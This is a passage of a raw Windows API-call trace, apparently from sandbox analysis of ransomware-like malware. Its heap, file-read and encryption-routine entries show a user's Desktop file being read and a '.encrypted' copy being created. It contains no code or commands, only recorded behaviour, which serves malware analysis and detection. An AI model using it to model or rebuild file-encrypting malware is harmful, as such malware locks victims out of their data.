RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.679] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.679] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aegtpts7bd.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.680] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.680] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0029.681] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0029.681] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0029.681] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.681] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0029.681] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.682] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xdc85, lpOverlapped=0x0) returned 1 [0029.683] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.683] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdc85) returned 0x8affc0 [0029.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0029.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.684] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdc85) returned 0x8bdc50 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdc85) returned 0x8affc0 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.685] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0029.685] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdc85) returned 0x8affc0 [0029.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0029.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdc85) returned 0x8cb8e0 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0029.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.687] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0029.688] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0029.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.688] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da328 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0029.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.689] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.689] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.690] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.690] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 